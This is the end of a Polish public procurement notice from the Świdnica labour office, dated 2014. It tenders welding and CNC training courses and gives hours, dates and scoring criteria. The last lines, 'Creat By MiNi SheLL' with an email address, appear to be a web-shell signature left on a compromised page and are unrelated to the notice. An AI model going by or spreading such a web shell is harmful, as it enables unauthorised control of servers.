gdy Zamawiającemu nie uda się skompletować pełnej grupy szkoleniowej osób uprawnionych do odbycia szkolenia - poprzez zmniejszenie liczby uczestników szkolenia do 20%, bądź gdy wyniknie nieoczekiwana konieczność zwiększenia liczby uczestników szkolenia. W takiej sytuacji zmianie ulega również całkowity koszt szkolenia liczony jako iloczyn opłaty za jednego uczestnika szkolenia ( wraz z egzaminem państwowym/zewnętrznym) i i ilości osób skierowanych na kurs.
konieczności zmniejszenia przez Wykonawcę kwoty preliminowanych kosztów związanych z realizowanym zamówieniem,
gdy Wykonawca uzasadni celowość i konieczność zwiększenia do 20% ilości zajęć praktycznych, kosztem zajęć teoretycznych, przy zachowaniu ogólnej ilości godzin każdej grupy szkoleniowej, pod warunkiem, że inne przepisy prawne dot. organizacji danego szkolenia nie stanowią inaczej,
zmiany terminu realizacji zamówienia bądź wyznaczenia (w porozumieniu z Wykonawcą) dodatkowego terminu wykonania przedmiotu zamówienia, w sytuacji, gdy:
niewykonanie zamówienia będzie spowodowane przyczynami niezależnymi od Wykonawcy (np. działania siły wyższej);
pełna grupa szkoleniowa osób uprawnionych do odbycia szkolenia nie zostanie na czas skompletowana;
zmiany w wykazie osób, którymi dysponuje lub będzie dysponował Wykonawca. Zmiany te muszą wynikać z przyczyn niezależnych od Wykonawcy, np. choroba osoby mającej prowadzić zajęcia. Zmiana może nastąpić wówczas, gdy nowa kadra dydaktyczna będzie posiadała stosowne uprawnienia do prowadzenia zajęć, a także wykształcenie i doświadczenie zawodowe nie mniejsze od osoby zastępowanej, której dane zostały przekazane wraz z ofertą Zamawiającemu,
zmiany miejsca organizacji szkolenia z zachowaniem zapisu pkt 9 informacji uzupełniających,
zmian w harmonogramie zajęć, programie szkolenia oraz we wzorach wydanych zaświadczeń, które zostały zaakceptowane przez Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.swidnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2014 godzina 08:30, miejsce: Powiatowy Urząd Pracy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodą MAG (135) oraz blach spoinami czołowymi metodą MAG (135) i spawanie blach i rur spoinami pachwinowymi metodą TIG (141) - 20 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie musi rozpocząć się w dniu 10.12.2014 r. i zakończyć około 20.02.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 14 dni kalendarzowych, przy zachowaniu wytycznych ujętych w opisie niniejszej części przedmiotu zamówienia, z uwzględnieniem pkt 9-14 INFORMACJI UZUPEŁNIAJĄCYCH.
Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie Świdnicy lub Wrocławia, bądź Wałbrzycha.
Plan nauczania powinien zawierać m.in. następujące tematy zajęć edukacyjnych:
1) SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI METODĄ MAG (135)
(25 godz. zegarowych zajęć teoretycznych oraz 120 godz. zegarowych zajęć praktycznych)
2) SPAWANIE BLACH SPOINAMI CZOŁOWYMI METODĄ MAG (135) 
(12 godz. zegarowych zajęć teoretycznych oraz 100 godz. zegarowych zajęć praktycznych)
3) SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI METODĄ TIG (141)
(23 godz. zegarowych zajęć teoretycznych oraz 80 godz. zegarowych zajęć praktycznych)
4) UMIEJĘTNOŚĆ POSZUKIWANIA I POZYSKIWANIA ZATRUDNIENIA.
Zagadnienia dotyczące spawania, jak również kwestie przeprowadzenia egzaminu państwowego/zewnętrznego muszą być zgodne z wytycznymi Instytutu Spawalnictwa w Gliwicach. 
Dodatkowo, dla ponadpodstawowego zakresu spawania Zamawiający wymaga przeprowadzenia egzaminu UDT lub egzaminu realizowanego przez niezależną międzynarodową jednostkę PersCert TÜV
Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 365 godzin zegarowych, w tym:
- zajęć teoretycznych: 65 godz. zegarowych, z czego 5 godzin zegarowych przypada na umiejętność poszukiwania zatrudnienia,
- zajęć praktycznych: 300 godz. zegarowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. certyfikat jakości usług lub inny dokument - 10</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Programowanie i obsługa obrabiarek sterowanych numerycznie CNC z blokiem rysunku technicznego - 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie musi rozpocząć się w dniu 10.12.2014 r. i zakończyć w dniu 23.01.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 14 dni kalendarzowych, przy zachowaniu wytycznych ujętych w opisie niniejszej części przedmiotu zamówienia, z uwzględnieniem pkt 9-14 INFORMACJI UZUPEŁNIAJĄCYCH.
Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie Świdnicy.
Plan nauczania powinien zawierać m.in. następujące tematy zajęć edukacyjnych:
1) Przepisy BHP i ergonomia pracy w zakresie obszaru zawodowego.
2) Pomiar kształtu i wymiarów przedmiotu obrabianego.
3) Kompletowanie, analiza i czytanie rysunku technicznego.
4) Obróbka skrawaniem i narzędzia skrawające w zakresie obrabiarek CNC.
5) Budowa obrabiarek CNC. Sterowanie i obsługa obrabiarek CNC. Przygotowanie obrabiarki CNC do pracy.
6) Przygotowanie programu do uruchomienia. 
7) Uruchomienie i przebieg programu obróbki.
8) Szkolenie praktyczne na maszynach produkcyjnych.
9) Praktyczna nauka obsługi tokarki oraz frezarki CNC.
10) Umiejętność poszukiwania i pozyskiwania zatrudnienia.
Szkolenie winno zostać zrealizowane w formie zajęć teoretycznych i praktycznych, przy czym zajęcia teoretyczne obejmujące zagadnienia wskazane w pozycjach 2-7 muszą zostać przeprowadzone również w postaci ćwiczeń.
Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 180 godzin zegarowych, w tym:
a) zajęć teoretycznych oraz ćwiczeń: 60 godz. zegarowych, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
b) zajęć praktycznych: 120 godz. zegarowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. certyfikat jakości usług lub inny dokument - 10</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com